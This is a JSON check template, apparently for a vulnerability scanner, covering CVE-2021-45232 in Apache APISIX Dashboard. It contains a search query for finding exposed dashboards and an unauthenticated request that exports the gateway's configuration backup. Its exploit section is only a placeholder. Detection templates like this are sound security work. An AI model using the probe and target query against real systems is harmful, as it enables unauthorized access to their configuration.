{
  "Name": "Apache APISIX Dashboard Unauthorized Access Vulnerability",
  "Description": "Attackers can access certain interfaces without logging in to Apache APISIX Dashboard, thus making unauthorized changes or obtaining relevant configuration information such as Apache APISIX Route, Upstream, Service, etc., and cause problems such as SSRF, malicious traffic proxies built by attackers, and arbitrary code execution.",
  "Product": "Apache APISIX",
  "Homepage": "https://apisix.apache.org/zh/",
  "DisclosureDate": "2021-12-29",
  "Author": "su18@javaweb.org",
  "FofaQuery": "title=\"Apache APISIX Dashboard\"",
  "GobyQuery": "title=\"Apache APISIX Dashboard\"",
  "Level": "3",
  "Impact": "Arbitrary Code execution",
  "Recommendation": "It is recommended that users change their default user name and password in a timely manner and restrict source IP access to the Apache APISIX Dashboard.",
  "References": [
    "https://nvd.nist.gov/vuln/detail/CVE-2021-45232"
  ],
  "Translation": {
    "CN": {
      "Name": "Apache APISIX Dashboard 未授权访问漏洞",
      "VulType": [ "命令执行" ],
      "Tags": [ "命令执行" ],
      "Description": "\n\nApache APISIX 是一个云原生 API 网关。\n\n攻击者无需登录 Apache APISIX Dashboard 即可访问某些接口,从而进行未授权更改或获取 Apache APISIX Route、Upstream、Service 等相关配置信息,并造成 SSRF、攻击者搭建恶意流量代理和任意代码执行等问题。\n\n",
      "Impact": "\n\n可能造成敏感信息泄露、SSRF、恶意流量代理、任意代码执行等影响。\n\n",
      "Product": "Apache APISIX",
      "Recommendation": "\n\n建议用户及时更改默认用户名与密码,并限制来源 IP 访问 Apache APISIX Dashboard。并及时更新至 Apache APISIX Dashboard 2.10.1 及以上版本。\n\n"
    }
  },
  "Is0day": false,
  "HasExp": true,
  "ExpParams": [
    { "name": "ip", "type": "input", "value": "your vps ip" },
    { "name": "port", "type": "input", "value": "your vps port" }
  ],
  "ExpTips": { "Type": "", "Content": "" },
  "ScanSteps": [
    "AND",
    {
      "Request": {
        "method": "GET",
        "uri": "/apisix/admin/migrate/export",
        "follow_redirect": false,
        "header": {},
        "data_type": "text",
        "data": ""
      },
      "ResponseTest": {
        "type": "group",
        "operation": "AND",
        "checks": [
          { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" },
          { "type": "item", "variable": "$head", "operation": "contains", "value": "Content-Disposition: attachment; filename=apisix-config.bak", "bz": "" },
          { "type": "item", "variable": "$body", "operation": "contains", "value": "Consumers", "bz": "" }
        ]
      },
      "SetVariable": []
    }
  ],
  "ExploitSteps": [
    "AND",
    {
      "Request": {
        "method": "GET",
        "uri": "/test.php",
        "follow_redirect": true,
        "header": {},
        "data_type": "text",
        "data": ""
      },
      "ResponseTest": {
        "type": "group",
        "operation": "AND",
        "checks": [
          { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" },
          { "type": "item", "variable": "$body", "operation": "contains", "value": "test", "bz": "" }
        ]
      },
      "SetVariable": []
    }
  ],
  "Tags": [ "rce" ],
  "VulType": [ "rce" ],
  "CVEIDs": [ "CVE-2021-45232" ],
  "CNNVD": [ "CNNVD-202112-2629" ],
  "CNVD": [ "" ],
  "CVSSScore": "7.3",
  "AttackSurfaces": {
    "Application": null,
    "Support": null,
    "Service": null,
    "System": null,
    "Hardware": null
  }
}